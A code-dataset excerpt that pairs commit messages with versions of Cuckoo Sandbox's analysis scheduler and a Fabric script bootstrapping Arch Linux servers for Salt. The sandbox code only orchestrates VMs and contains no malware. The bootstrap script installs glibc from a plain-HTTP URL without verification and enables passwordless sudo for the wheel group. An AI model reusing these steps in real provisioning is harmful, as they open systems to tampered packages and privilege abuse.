CombinedText stringlengths 4 3.42M |
|---|
Set a fixed guid for theme_resources.
Review URL: http://codereview.chromium.org/126058
git-svn-id: dd90618784b6a4b323ea0c23a071cb1c9e6f2ac7@18288 4ff67af0-8c30-449e-8e8b-ad334ec8d88c
|
# Copyright (C) 2010-2013 Cuckoo Sandbox Developers.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import os
import time
import shutil
import logging
import Queue
from threading import Thread, Lock
from lib.cuckoo.common.constants import CUCKOO_ROOT
from lib.cuckoo.common.exceptions import CuckooMachineError, CuckooGuestError, CuckooOperationalError, CuckooCriticalError
from lib.cuckoo.common.objects import File
from lib.cuckoo.common.utils import create_folder
from lib.cuckoo.common.config import Config
from lib.cuckoo.core.database import Database, TASK_COMPLETED, TASK_REPORTED
from lib.cuckoo.core.guest import GuestManager
from lib.cuckoo.core.resultserver import Resultserver
from lib.cuckoo.core.plugins import list_plugins, RunAuxiliary, RunProcessing, RunSignatures, RunReporting
log = logging.getLogger(__name__)
machinery = None
machine_lock = Lock()
class AnalysisManager(Thread):
    """Analysis Manager.

    This class handles the full analysis process for a given task. It takes
    care of selecting the analysis machine, preparing the configuration and
    interacting with the guest agent and analyzer components to launch and
    complete the analysis and store, process and report its results.
    """

    def __init__(self, task, error_queue):
        """@param task: task object containing the details for the analysis.
        @param error_queue: queue used to hand fatal exceptions back to the
            scheduler loop.
        """
        Thread.__init__(self)
        # NOTE(review): this assigns the daemon flag on the Thread *class*
        # rather than on this instance (probably meant ``self.daemon = True``);
        # the net effect is still that analysis threads are daemonic.
        Thread.daemon = True

        self.task = task
        self.errors = error_queue
        self.cfg = Config()
        # Analysis storage folder path, populated by init_storage().
        self.storage = ""
        # Path of the deduplicated copy of the sample, populated by store_file().
        self.binary = ""
        # Machine object acquired for this analysis, populated by acquire_machine().
        self.machine = None

    def init_storage(self):
        """Initialize analysis storage folder.
        @return: True on success, False if the folder already exists or
            cannot be created.
        """
        self.storage = os.path.join(CUCKOO_ROOT,
                                    "storage",
                                    "analyses",
                                    str(self.task.id))

        # If the analysis storage folder already exists, we need to abort the
        # analysis or previous results will be overwritten and lost.
        if os.path.exists(self.storage):
            log.error("Analysis results folder already exists at path \"%s\","
                      " analysis aborted", self.storage)
            return False

        # If we're not able to create the analysis storage folder, we have to
        # abort the analysis.
        try:
            create_folder(folder=self.storage)
        except CuckooOperationalError:
            log.error("Unable to create analysis folder %s", self.storage)
            return False

        return True

    def store_file(self):
        """Store a copy of the file being analyzed.
        @return: True on success (a failed symlink/copy into the analysis
            folder is only logged), False if the target is missing or the
            copy into the binaries store fails.
        """
        if not os.path.exists(self.task.target):
            log.error("The file to analyze does not exist at path \"%s\", "
                      "analysis aborted", self.task.target)
            return False

        # Samples are stored deduplicated, keyed by their SHA256 digest.
        sha256 = File(self.task.target).get_sha256()
        self.binary = os.path.join(CUCKOO_ROOT, "storage", "binaries", sha256)

        if os.path.exists(self.binary):
            log.info("File already exists at \"%s\"", self.binary)
        else:
            # TODO: do we really need to abort the analysis in case we are not
            # able to store a copy of the file?
            try:
                shutil.copy(self.task.target, self.binary)
            except (IOError, shutil.Error) as e:
                log.error("Unable to store file from \"%s\" to \"%s\", "
                          "analysis aborted", self.task.target, self.binary)
                return False

        try:
            # Expose the stored sample inside the analysis folder, via symlink
            # where the platform supports it, otherwise via a plain copy.
            new_binary_path = os.path.join(self.storage, "binary")
            if hasattr(os, "symlink"):
                os.symlink(self.binary, new_binary_path)
            else:
                shutil.copy(self.binary, new_binary_path)
        except (AttributeError, OSError) as e:
            # Best effort only: a missing link does not abort the analysis.
            log.error("Unable to create symlink/copy from \"%s\" to \"%s\"", self.binary, self.storage)

        return True

    def acquire_machine(self):
        """Acquire an analysis machine from the pool of available ones.
        Blocks (polling once per second) until a suitable machine is free,
        then stores it in ``self.machine``.
        """
        machine = None

        # Start a loop to acquire a machine to run the analysis on.
        while True:
            machine_lock.acquire()

            # If the user specified a specific machine ID, a platform to be
            # used or machine tags acquire the machine accordingly.
            try:
                machine = machinery.acquire(machine_id=self.task.machine,
                                            platform=self.task.platform,
                                            tags=self.task.tags)
            finally:
                machine_lock.release()

            # If no machine is available at this moment, wait for one second
            # and try again.
            if not machine:
                log.debug("Task #%d: no machine available yet", self.task.id)
                time.sleep(1)
            else:
                log.info("Task #%d: acquired machine %s (label=%s)", self.task.id, machine.name, machine.label)
                break

        self.machine = machine

    def build_options(self):
        """Generate analysis options.
        @return: options dict handed to the guest analyzer.
        """
        options = {}

        options["id"] = self.task.id
        options["ip"] = self.machine.resultserver_ip
        options["port"] = self.machine.resultserver_port
        options["category"] = self.task.category
        options["target"] = self.task.target
        options["package"] = self.task.package
        options["options"] = self.task.options
        options["enforce_timeout"] = self.task.enforce_timeout
        options["clock"] = self.task.clock

        # Fall back to the configured default when no timeout was requested.
        if not self.task.timeout or self.task.timeout == 0:
            options["timeout"] = self.cfg.timeouts.default
        else:
            options["timeout"] = self.task.timeout

        # File targets additionally carry name and magic type for the analyzer.
        if self.task.category == "file":
            options["file_name"] = File(self.task.target).get_name()
            options["file_type"] = File(self.task.target).get_type()

        return options

    def launch_analysis(self):
        """Start analysis.
        @return: True if the guest analysis ran to completion, False on any
            setup or guest failure.
        """
        succeeded = False

        log.info("Starting analysis of %s \"%s\" (task=%d)", self.task.category.upper(), self.task.target, self.task.id)

        # Initialize the analysis folders.
        if not self.init_storage():
            return False

        if self.task.category == "file":
            # Store a copy of the original file.
            if not self.store_file():
                return False

        # Acquire analysis machine.
        try:
            self.acquire_machine()
        except CuckooOperationalError as e:
            log.error("Cannot acquire machine: {0}".format(e))
            return False

        # Generate the analysis configuration file.
        options = self.build_options()

        # At this point we can tell the Resultserver about it.
        try:
            Resultserver().add_task(self.task, self.machine)
        except Exception as e:
            # NOTE(review): the error is queued for the scheduler, but the
            # analysis still proceeds past this point.
            machinery.release(self.machine.label)
            self.errors.put(e)

        # Run auxiliary modules (e.g. sniffers) alongside the analysis.
        aux = RunAuxiliary(task=self.task, machine=self.machine)
        aux.start()

        try:
            # Mark the selected analysis machine in the database as started.
            guest_log = Database().guest_start(self.task.id,
                                               self.machine.name,
                                               self.machine.label,
                                               machinery.__class__.__name__)
            # Start the machine.
            machinery.start(self.machine.label)
        except CuckooMachineError as e:
            log.error(str(e), extra={"task_id" : self.task.id})
            # Stop Auxiliary modules.
            aux.stop()
            return False
        else:
            try:
                # Initialize the guest manager.
                guest = GuestManager(self.machine.name, self.machine.ip, self.machine.platform)
                # Start the analysis.
                guest.start_analysis(options)
            except CuckooGuestError as e:
                log.error(str(e), extra={"task_id" : self.task.id})
                # Stop Auxiliary modules.
                aux.stop()
                return False
            else:
                # Wait for analysis completion.
                try:
                    guest.wait_for_completion()
                    succeeded = True
                except CuckooGuestError as e:
                    log.error(str(e), extra={"task_id" : self.task.id})
                    succeeded = False
                finally:
                    # Stop Auxiliary modules.
                    aux.stop()

        # Take a memory dump of the machine before shutting it off.
        if self.cfg.cuckoo.memory_dump or self.task.memory:
            try:
                machinery.dump_memory(self.machine.label,
                                      os.path.join(self.storage, "memory.dmp"))
            except NotImplementedError:
                log.error("The memory dump functionality is not available "
                          "for current machine manager")
            except CuckooMachineError as e:
                log.error(e)

        try:
            # Stop the analysis machine.
            machinery.stop(self.machine.label)
        except CuckooMachineError as e:
            log.warning("Unable to stop machine %s: %s", self.machine.label, e)

        # Mark the machine in the database as stopped.
        Database().guest_stop(guest_log)

        try:
            # Release the analysis machine.
            machinery.release(self.machine.label)
        except CuckooMachineError as e:
            log.error("Unable to release machine %s, reason %s. "
                      "You might need to restore it manually", self.machine.label, e)

        # After all this, we can make the Resultserver forget about it.
        Resultserver().del_task(self.task, self.machine)

        return succeeded

    def process_results(self):
        """Process the analysis results and generate the enabled reports.
        @return: True (reporting problems are logged, not propagated).
        """
        results = RunProcessing(task_id=self.task.id).run()
        RunSignatures(results=results).run()
        RunReporting(task_id=self.task.id, results=results).run()

        # Debug aid: how often each process log had to be re-parsed.
        for proc in results["behavior"]["processes"]:
            log.debug("ParseProcessLog instance for %d (%s) parsed its log %d times.",
                      proc["process_id"], proc["process_name"], proc["calls"].parsecount)

        # If the target is a file and the user enabled the option,
        # delete the original copy.
        if self.task.category == "file" and self.cfg.cuckoo.delete_original:
            try:
                os.remove(self.task.target)
            except OSError as e:
                log.error("Unable to delete original file at path \"%s\": %s", self.task.target, e)

        log.info("Task #%d: reports generation completed (path=%s)", self.task.id, self.storage)

        return True

    def run(self):
        """Run manager thread: launch the analysis, then process and report
        its results, updating the task status in the database along the way.
        """
        success = self.launch_analysis()

        Database().set_status(self.task.id, TASK_COMPLETED)
        log.debug("Released database task #%d with status %s", self.task.id, success)

        self.process_results()
        Database().set_status(self.task.id, TASK_REPORTED)

        log.info("Task #%d: analysis procedure completed", self.task.id)
class Scheduler:
    """Tasks Scheduler.

    This class is responsible for the main execution loop of the tool. It
    prepares the analysis machines and keep waiting and loading for new
    analysis tasks.
    Whenever a new task is available, it launches AnalysisManager which will
    take care of running the full analysis process and operating with the
    assigned analysis machine.
    """

    def __init__(self):
        # Main-loop control flag, cleared by stop().
        self.running = True
        self.cfg = Config()
        self.db = Database()

    def initialize(self):
        """Initialize the machine manager."""
        global machinery

        name = self.cfg.cuckoo.machine_manager
        log.info("Using \"%s\" machine manager", name)

        # Exactly one machine manager module is ever imported, so the plugin
        # list holds a single class: instantiate it as the global manager.
        machinery = list_plugins("machinery")[0]()

        # Locate the manager's configuration file and bail out hard if it
        # is missing.
        conf = os.path.join(CUCKOO_ROOT, "conf", "%s.conf" % name)
        if not os.path.exists(conf):
            raise CuckooCriticalError("The configuration file for machine "
                                      "manager \"{0}\" does not exist at path: "
                                      "{1}".format(name, conf))

        # Hand the parsed configuration over and let the manager set itself up.
        machinery.set_options(Config(conf))
        machinery.initialize(name)

        # By now every available machine should be registered; with none,
        # Cuckoo cannot do anything useful and must abort.
        if len(machinery.machines()) == 0:
            raise CuckooCriticalError("No machines available")
        else:
            log.info("Loaded %s machine/s", len(machinery.machines()))

    def stop(self):
        """Stop scheduler."""
        self.running = False
        # Shutdown machine manager (used to kill machines that still alive).
        machinery.shutdown()

    def start(self):
        """Start scheduler."""
        self.initialize()

        log.info("Waiting for analysis tasks...")

        # Thread-safe queue through which analysis threads report fatal
        # exceptions back to this loop (simple IPC).
        errors = Queue.Queue()

        while self.running:
            time.sleep(1)

            # No point polling the database while every machine is busy.
            if machinery.availables() == 0:
                continue

            # Grab one pending task, if any, and hand it to a fresh
            # analysis thread.
            task = self.db.fetch()
            if task:
                log.debug("Processing task #%s", task.id)
                AnalysisManager(task, errors).start()

            # Re-raise any fatal error reported by an analysis thread.
            try:
                error = errors.get(block=False)
            except Queue.Empty:
                pass
            else:
                raise error
Cleanup
# Copyright (C) 2010-2013 Cuckoo Sandbox Developers.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import os
import time
import shutil
import logging
import Queue
from threading import Thread, Lock
from lib.cuckoo.common.constants import CUCKOO_ROOT
from lib.cuckoo.common.exceptions import CuckooMachineError, CuckooGuestError, CuckooOperationalError, CuckooCriticalError
from lib.cuckoo.common.objects import File
from lib.cuckoo.common.utils import create_folder
from lib.cuckoo.common.config import Config
from lib.cuckoo.core.database import Database, TASK_COMPLETED, TASK_REPORTED
from lib.cuckoo.core.guest import GuestManager
from lib.cuckoo.core.resultserver import Resultserver
from lib.cuckoo.core.plugins import list_plugins, RunAuxiliary, RunProcessing, RunSignatures, RunReporting
log = logging.getLogger(__name__)
machinery = None
machine_lock = Lock()
class AnalysisManager(Thread):
    """Analysis Manager.

    This class handles the full analysis process for a given task. It takes
    care of selecting the analysis machine, preparing the configuration and
    interacting with the guest agent and analyzer components to launch and
    complete the analysis and store, process and report its results.
    """

    def __init__(self, task, error_queue):
        """@param task: task object containing the details for the analysis.
        @param error_queue: queue used to hand fatal exceptions back to the
            scheduler loop.
        """
        Thread.__init__(self)
        # NOTE(review): this assigns the daemon flag on the Thread *class*
        # rather than on this instance (probably meant ``self.daemon = True``);
        # the net effect is still that analysis threads are daemonic.
        Thread.daemon = True

        self.task = task
        self.errors = error_queue
        self.cfg = Config()
        # Analysis storage folder path, populated by init_storage().
        self.storage = ""
        # Path of the deduplicated copy of the sample, populated by store_file().
        self.binary = ""
        # Machine object acquired for this analysis, populated by acquire_machine().
        self.machine = None

    def init_storage(self):
        """Initialize analysis storage folder.
        @return: True on success, False if the folder already exists or
            cannot be created.
        """
        self.storage = os.path.join(CUCKOO_ROOT,
                                    "storage",
                                    "analyses",
                                    str(self.task.id))

        # If the analysis storage folder already exists, we need to abort the
        # analysis or previous results will be overwritten and lost.
        if os.path.exists(self.storage):
            log.error("Analysis results folder already exists at path \"%s\","
                      " analysis aborted", self.storage)
            return False

        # If we're not able to create the analysis storage folder, we have to
        # abort the analysis.
        try:
            create_folder(folder=self.storage)
        except CuckooOperationalError:
            log.error("Unable to create analysis folder %s", self.storage)
            return False

        return True

    def store_file(self):
        """Store a copy of the file being analyzed.
        @return: True on success (a failed symlink/copy into the analysis
            folder is only logged), False if the target is missing or the
            copy into the binaries store fails.
        """
        if not os.path.exists(self.task.target):
            log.error("The file to analyze does not exist at path \"%s\", "
                      "analysis aborted", self.task.target)
            return False

        # Samples are stored deduplicated, keyed by their SHA256 digest.
        sha256 = File(self.task.target).get_sha256()
        self.binary = os.path.join(CUCKOO_ROOT, "storage", "binaries", sha256)

        if os.path.exists(self.binary):
            log.info("File already exists at \"%s\"", self.binary)
        else:
            # TODO: do we really need to abort the analysis in case we are not
            # able to store a copy of the file?
            try:
                shutil.copy(self.task.target, self.binary)
            except (IOError, shutil.Error) as e:
                log.error("Unable to store file from \"%s\" to \"%s\", "
                          "analysis aborted", self.task.target, self.binary)
                return False

        try:
            # Expose the stored sample inside the analysis folder, via symlink
            # where the platform supports it, otherwise via a plain copy.
            new_binary_path = os.path.join(self.storage, "binary")
            if hasattr(os, "symlink"):
                os.symlink(self.binary, new_binary_path)
            else:
                shutil.copy(self.binary, new_binary_path)
        except (AttributeError, OSError) as e:
            # Best effort only: a missing link does not abort the analysis.
            log.error("Unable to create symlink/copy from \"%s\" to \"%s\"", self.binary, self.storage)

        return True

    def acquire_machine(self):
        """Acquire an analysis machine from the pool of available ones.
        Blocks (polling once per second) until a suitable machine is free,
        then stores it in ``self.machine``.
        """
        machine = None

        # Start a loop to acquire a machine to run the analysis on.
        while True:
            machine_lock.acquire()

            # If the user specified a specific machine ID, a platform to be
            # used or machine tags acquire the machine accordingly.
            try:
                machine = machinery.acquire(machine_id=self.task.machine,
                                            platform=self.task.platform,
                                            tags=self.task.tags)
            finally:
                machine_lock.release()

            # If no machine is available at this moment, wait for one second
            # and try again.
            if not machine:
                log.debug("Task #%d: no machine available yet", self.task.id)
                time.sleep(1)
            else:
                log.info("Task #%d: acquired machine %s (label=%s)", self.task.id, machine.name, machine.label)
                break

        self.machine = machine

    def build_options(self):
        """Generate analysis options.
        @return: options dict handed to the guest analyzer.
        """
        options = {}

        options["id"] = self.task.id
        options["ip"] = self.machine.resultserver_ip
        options["port"] = self.machine.resultserver_port
        options["category"] = self.task.category
        options["target"] = self.task.target
        options["package"] = self.task.package
        options["options"] = self.task.options
        options["enforce_timeout"] = self.task.enforce_timeout
        options["clock"] = self.task.clock

        # Fall back to the configured default when no timeout was requested.
        if not self.task.timeout or self.task.timeout == 0:
            options["timeout"] = self.cfg.timeouts.default
        else:
            options["timeout"] = self.task.timeout

        # File targets additionally carry name and magic type for the analyzer.
        if self.task.category == "file":
            options["file_name"] = File(self.task.target).get_name()
            options["file_type"] = File(self.task.target).get_type()

        return options

    def launch_analysis(self):
        """Start analysis.
        @return: True if the guest analysis ran to completion, False on any
            setup or guest failure.
        """
        succeeded = False

        log.info("Starting analysis of %s \"%s\" (task=%d)", self.task.category.upper(), self.task.target, self.task.id)

        # Initialize the analysis folders.
        if not self.init_storage():
            return False

        if self.task.category == "file":
            # Store a copy of the original file.
            if not self.store_file():
                return False

        # Acquire analysis machine.
        try:
            self.acquire_machine()
        except CuckooOperationalError as e:
            log.error("Cannot acquire machine: {0}".format(e))
            return False

        # Generate the analysis configuration file.
        options = self.build_options()

        # At this point we can tell the Resultserver about it.
        try:
            Resultserver().add_task(self.task, self.machine)
        except Exception as e:
            # NOTE(review): the error is queued for the scheduler, but the
            # analysis still proceeds past this point.
            machinery.release(self.machine.label)
            self.errors.put(e)

        # Run auxiliary modules (e.g. sniffers) alongside the analysis.
        aux = RunAuxiliary(task=self.task, machine=self.machine)
        aux.start()

        try:
            # Mark the selected analysis machine in the database as started.
            guest_log = Database().guest_start(self.task.id,
                                               self.machine.name,
                                               self.machine.label,
                                               machinery.__class__.__name__)
            # Start the machine.
            machinery.start(self.machine.label)
        except CuckooMachineError as e:
            log.error(str(e), extra={"task_id": self.task.id})
            # Stop Auxiliary modules.
            aux.stop()
            return False
        else:
            try:
                # Initialize the guest manager.
                guest = GuestManager(self.machine.name, self.machine.ip, self.machine.platform)
                # Start the analysis.
                guest.start_analysis(options)
            except CuckooGuestError as e:
                log.error(str(e), extra={"task_id": self.task.id})
                # Stop Auxiliary modules.
                aux.stop()
                return False
            else:
                # Wait for analysis completion.
                try:
                    guest.wait_for_completion()
                    succeeded = True
                except CuckooGuestError as e:
                    log.error(str(e), extra={"task_id": self.task.id})
                    succeeded = False
                finally:
                    # Stop Auxiliary modules.
                    aux.stop()

        # Take a memory dump of the machine before shutting it off.
        if self.cfg.cuckoo.memory_dump or self.task.memory:
            try:
                machinery.dump_memory(self.machine.label,
                                      os.path.join(self.storage, "memory.dmp"))
            except NotImplementedError:
                log.error("The memory dump functionality is not available "
                          "for current machine manager")
            except CuckooMachineError as e:
                log.error(e)

        try:
            # Stop the analysis machine.
            machinery.stop(self.machine.label)
        except CuckooMachineError as e:
            log.warning("Unable to stop machine %s: %s", self.machine.label, e)

        # Mark the machine in the database as stopped.
        Database().guest_stop(guest_log)

        try:
            # Release the analysis machine.
            machinery.release(self.machine.label)
        except CuckooMachineError as e:
            log.error("Unable to release machine %s, reason %s. "
                      "You might need to restore it manually", self.machine.label, e)

        # After all this, we can make the Resultserver forget about it.
        Resultserver().del_task(self.task, self.machine)

        return succeeded

    def process_results(self):
        """Process the analysis results and generate the enabled reports.
        @return: True (reporting problems are logged, not propagated).
        """
        results = RunProcessing(task_id=self.task.id).run()
        RunSignatures(results=results).run()
        RunReporting(task_id=self.task.id, results=results).run()

        # Debug aid: how often each process log had to be re-parsed.
        for proc in results["behavior"]["processes"]:
            log.debug("ParseProcessLog instance for %d (%s) parsed its log %d times.",
                      proc["process_id"], proc["process_name"], proc["calls"].parsecount)

        # If the target is a file and the user enabled the option,
        # delete the original copy.
        if self.task.category == "file" and self.cfg.cuckoo.delete_original:
            try:
                os.remove(self.task.target)
            except OSError as e:
                log.error("Unable to delete original file at path \"%s\": %s", self.task.target, e)

        log.info("Task #%d: reports generation completed (path=%s)", self.task.id, self.storage)

        return True

    def run(self):
        """Run manager thread: launch the analysis, then process and report
        its results, updating the task status in the database along the way.
        """
        success = self.launch_analysis()

        Database().set_status(self.task.id, TASK_COMPLETED)
        log.debug("Released database task #%d with status %s", self.task.id, success)

        self.process_results()
        Database().set_status(self.task.id, TASK_REPORTED)

        log.info("Task #%d: analysis procedure completed", self.task.id)
class Scheduler:
    """Tasks Scheduler.

    This class is responsible for the main execution loop of the tool. It
    prepares the analysis machines and keep waiting and loading for new
    analysis tasks.
    Whenever a new task is available, it launches AnalysisManager which will
    take care of running the full analysis process and operating with the
    assigned analysis machine.
    """

    def __init__(self):
        # Main-loop control flag, cleared by stop().
        self.running = True
        self.cfg = Config()
        self.db = Database()

    def initialize(self):
        """Initialize the machine manager.
        @raise CuckooCriticalError: if the manager's configuration file is
            missing or no analysis machines are available.
        """
        global machinery

        machinery_name = self.cfg.cuckoo.machine_manager
        log.info("Using \"%s\" machine manager", machinery_name)

        # Get registered class name. Only one machine manager is imported,
        # therefore there should be only one class in the list.
        plugin = list_plugins("machinery")[0]
        # Initialize the machine manager.
        machinery = plugin()

        # Find its configuration file.
        conf = os.path.join(CUCKOO_ROOT, "conf", "%s.conf" % machinery_name)

        if not os.path.exists(conf):
            raise CuckooCriticalError("The configuration file for machine "
                                      "manager \"{0}\" does not exist at path: "
                                      "{1}".format(machinery_name, conf))

        # Provide a dictionary with the configuration options to the
        # machine manager instance.
        machinery.set_options(Config(conf))

        # Initialize the machine manager.
        machinery.initialize(machinery_name)

        # At this point all the available machines should have been identified
        # and added to the list. If none were found, Cuckoo needs to abort the
        # execution. Query the machine list once instead of twice and use
        # truthiness instead of a len() == 0 comparison.
        machines = machinery.machines()
        if not machines:
            raise CuckooCriticalError("No machines available")
        log.info("Loaded %s machine/s", len(machines))

    def stop(self):
        """Stop scheduler."""
        self.running = False
        # Shutdown machine manager (used to kill machines that still alive).
        machinery.shutdown()

    def start(self):
        """Start scheduler: poll the database for pending tasks and hand
        each one to a fresh AnalysisManager thread.
        @raise Exception: re-raises any fatal error reported by an analysis
            thread through the shared error queue.
        """
        self.initialize()

        log.info("Waiting for analysis tasks...")

        # Message queue with threads to transmit exceptions (used as IPC).
        errors = Queue.Queue()

        # This loop runs until stop() clears the flag.
        while self.running:
            time.sleep(1)

            # If no machines are available, it's pointless to fetch for
            # pending tasks. Loop over.
            if machinery.availables() == 0:
                continue

            # Fetch a pending analysis task.
            task = self.db.fetch()

            if task:
                log.debug("Processing task #%s", task.id)

                # Initialize and start the analysis manager thread.
                analysis = AnalysisManager(task, errors)
                analysis.start()

            # Deal with errors raised by analysis threads.
            try:
                error = errors.get(block=False)
            except Queue.Empty:
                pass
            else:
                raise error
|
REF: temporarily setting the continuous labels option because it does not compile on Linux. See issue #415
|
import time
from fabric.api import env, run, sudo
from fabric.context_managers import settings as fabric_settings
from fabric.contrib.files import append, sed, uncomment
from fabric.operations import reboot
DISTRO = "ARCH_201110"
SALT_INSTALLERS = ["aur", "aur-git"]
def bootstrap():
    """
    Bootstrap Arch Linux.

    Only the bare essentials, the configurator will take care of the rest.
    Runs as a long, order-sensitive sequence of remote shell commands:
    filesystem/tzdata must be upgraded before pacman, and the kernel must be
    configured before the full system upgrade.
    """
    # manually set hostname so salt finds proper hostname via socket.gethostname()
    for server in env.bootmachine_servers:
        if server.public_ip == env.host:
            sed("/etc/hosts", "# End of file", "")
            append("/etc/hosts", "{0} {1}".format(server.public_ip, server.name))
            append("/etc/hosts", "{0} {1}".format(server.private_ip, server.name))
            append("/etc/hosts", "\n# End of file")
    # pre upgrade maintenance (updating filesystem and tzdata before pacman)
    run("pacman -Syy")
    run("rm -rf /var/run /var/lock")
    run("printf 'n\nY\n' | pacman -S --force filesystem")
    run("printf 'n\nY\n' | pacman -S tzdata")
    run("printf 'n\nY\n' | pacman -S haveged")
    # https://www.archlinux.org/news/the-lib-directory-becomes-a-symlink/
    run("pacman --noconfirm -U http://pkgbuild.com/~allan/glibc-2.16.0-1-x86_64.pkg.tar.xz")
    # upgrade pacman
    run("pacman --noconfirm -S pacman")
    # haveged generates the entropy necessary for making a pacman gpg key
    run("rc.d start haveged", pty=False)
    run("pacman-key --init")
    run("rc.d stop haveged", pty=False)
    run("pacman --noconfirm -Rns haveged")
    # sign the master pacman keys https://wiki.archlinux.org/index.php/Pacman-key#Master_keys
    # Note: Level 3 'marginal trust' is suggested, but had to trust level of 4 because of an unknown error.
    run("for key in 6AC6A4C2 824B18E8 4C7EA887 FFF979E7 CDFD6BB0; \
        do pacman-key --recv-keys $key; pacman-key --lsign-key $key; \
        printf 'trust\n4\nquit\n' | gpg --homedir /etc/pacman.d/gnupg/ --no-permission-warning --command-fd 0 --edit-key $key; \
        done")
    # ARGH!!! printf won't work here!!!
    #run("printf 'Y\nY\nY\nY\nY\nY\nY\nY\n' | pacman-key --populate archlinux", shell=False)
    # configure new kernel and reboot (before system upgrade!!)
    run("printf 'y\ny\nY\nY\nY\nY\nY\nY\nY\nY\nY\n' | pacman --force -S linux mkinitcpio udev")  # key accepting does work here
    sed("/etc/mkinitcpio.conf", "xen-", "xen_")  # patch: https://projects.archlinux.org/mkinitcpio.git/commit/?id=5b99f78331f567cc1442460efc054b72c45306a6
    sed("/etc/mkinitcpio.conf", "usbinput", "usbinput fsck")
    run("mkinitcpio -p linux")
    reboot()
    # full system upgrade and installation of a few essential packages and another reboot for good measure
    run("pacman --noconfirm -Syyu")
    run("pacman --noconfirm -S base-devel")
    run("pacman --noconfirm -S curl git rsync")
    reboot()
    # install yaourt
    append("/etc/pacman.conf", "\n[archlinuxfr]\nServer = http://repo.archlinux.fr/$arch", use_sudo=True)
    run("pacman -Syy")
    run("pacman --noconfirm -S yaourt")
    # create a user, named 'aur', to safely install packages under fakeroot
    # uid and gid values auto increment from 1000
    # to prevent conflicts set the 'aur' user's gid and uid to 902
    run("groupadd -g 902 aur && useradd -u 902 -g 902 -G wheel aur")
    uncomment("/etc/sudoers", "wheel.*NOPASSWD")
    # tweak sshd_config (before reboot so it is restarted!) so fabric can sftp with contrib.files.put, see:
    # http://stackoverflow.com/questions/10221839/cant-use-fabric-put-is-there-any-server-configuration-needed
    sed("/etc/ssh/sshd_config", "Subsystem sftp /usr/lib/openssh/sftp-server", "Subsystem sftp internal-sftp")
    run("rc.d restart sshd", pty=False)
def install_salt(installer="aur"):
    """
    Install salt from the AUR.

    @param installer: which AUR package to build: "aur" (release) or
        "aur-git" (development snapshot); see SALT_INSTALLERS.
    @raise NotImplementedError: if ``installer`` is not a known choice.
    """
    # TODO: figure out how to run yaourt under fakeroot
    # TODO: support installation or freezing at an older version
    if installer == "aur":
        sudo("yaourt --noconfirm -S salt", user="aur")
    elif installer == "aur-git":
        sudo("yaourt --noconfirm -S salt-git", user="aur")
    else:
        # Name the offending value instead of raising a bare, message-less
        # NotImplementedError -- much easier to debug from a fabric log.
        raise NotImplementedError("unknown salt installer: {0}".format(installer))
def start_salt():
    """
    See: http://salt.readthedocs.org/en/latest/topics/installation/arch.html
    Upload the bootmachine's bundled salt-states.
    Launch the salt-master daemon on the saltmaster server.
    Launch a salt-minion daemon on all servers, including the saltmaster.
    """
    run("cp /etc/salt/minion.template /etc/salt/minion")

    on_master = env.host == env.master_server.public_ip
    if on_master:
        # The saltmaster runs both the master daemon and its own minion.
        run("cp /etc/salt/master.template /etc/salt/master")
        sed("/etc/rc.conf", "crond sshd", "crond sshd iptables @salt-master @salt-minion")
        run("rc.d start salt-master", pty=False)
    else:
        sed("/etc/rc.conf", "crond sshd", "crond sshd iptables @salt-minion")

    # Point the minion at its master: itself when this host is the master,
    # the master's hostname otherwise.
    master_host = "localhost" if on_master else "{hostname}".format(hostname=env.master_server.name)
    sed("/etc/salt/minion", "#master: salt", "master: " + master_host)

    run("rc.d start salt-minion", pty=False)
def restart_salt():
    """
    Restarts salt master and/or minions.
    """
    with fabric_settings(warn_only=True):
        # The saltmaster bounces its master daemon first, then -- like every
        # other host -- its minion.
        if env.host == env.master_server.public_ip:
            sudo("rc.d restart salt-master", pty=False)
            time.sleep(3)
        sudo("rc.d restart salt-minion", pty=False)
rackspace/archlinux fixes for glibc, netcfg, and more.
import time
from fabric.api import env, run, sudo
from fabric.context_managers import settings as fabric_settings
from fabric.contrib.files import append, sed, uncomment
from fabric.operations import reboot
DISTRO = "ARCH_201110"
SALT_INSTALLERS = ["aur", "aur-git"]
def bootstrap():
    """
    Bootstrap Arch Linux.

    Only the bare essentials, the configurator will take care of the rest.
    Runs as a long, order-sensitive sequence of remote shell commands: glibc
    is held back until the conflicting xen packages are replaced, and the
    kernel is configured just before the final reboot.
    """
    # manually set hostname so salt finds it via socket.gethostname()
    for server in env.bootmachine_servers:
        if server.public_ip == env.host:
            sed("/etc/hosts", "# End of file", "")
            append("/etc/hosts", "{0} {1}".format(server.public_ip, server.name))
            append("/etc/hosts", "{0} {1}".format(server.private_ip, server.name))
            append("/etc/hosts", "\n# End of file")
    # pre upgrade maintenance (updating filesystem and tzdata before pacman)
    run("pacman -Syy")
    run("rm -rf /var/run /var/lock")
    run("printf 'n\nY\n' | pacman -S --force filesystem")
    run("printf 'n\nY\n' | pacman -S tzdata")
    # haveged generates the entropy necessary for making the pacman gpg key
    run("printf 'n\nY\n' | pacman -S haveged")
    run("rc.d start haveged", pty=False)
    # upgrade everything except glibc
    # https://www.archlinux.org/news/the-lib-directory-becomes-a-symlink/
    run("pacman --noconfirm -U http://pkgbuild.com/~allan/glibc-2.16.0-1-x86_64.pkg.tar.xz")
    run("rm /etc/profile.d/locale.sh")
    run("printf 'n\nY\nY\nY\nY\nY\nY\nY\nY\nY\nY\n' | pacman -Su --ignore glibc")
    # configure pacman
    run("rc.d restart haveged")
    run("pacman-key --init")
    run("rc.d stop haveged", pty=False)
    run("pacman --noconfirm -Rns haveged")
    # sign the master pacman keys https://wiki.archlinux.org/index.php/Pacman-key#Master_keys
    # Note: Level 3 'marginal trust' is suggested, but had to trust level of 4 because of an unknown error.
    run("for key in 6AC6A4C2 824B18E8 4C7EA887 FFF979E7 CDFD6BB0; \
        do pacman-key --recv-keys $key; pacman-key --lsign-key $key; \
        printf 'trust\n4\nquit\n' | gpg --homedir /etc/pacman.d/gnupg/ --no-permission-warning --command-fd 0 --edit-key $key; \
        done")
    # ARGH!!! printf won't work here!!!
    #run("printf 'Y\nY\nY\nY\nY\nY\nY\nY\n' | pacman-key --populate archlinux", shell=False)
    # install essential packages
    run("pacman --noconfirm -S base-devel")
    run("pacman --noconfirm -S curl git rsync")
    append("/etc/pacman.conf", "\n[archlinuxfr]\nServer = http://repo.archlinux.fr/$arch", use_sudo=True)
    run("pacman -Syy")
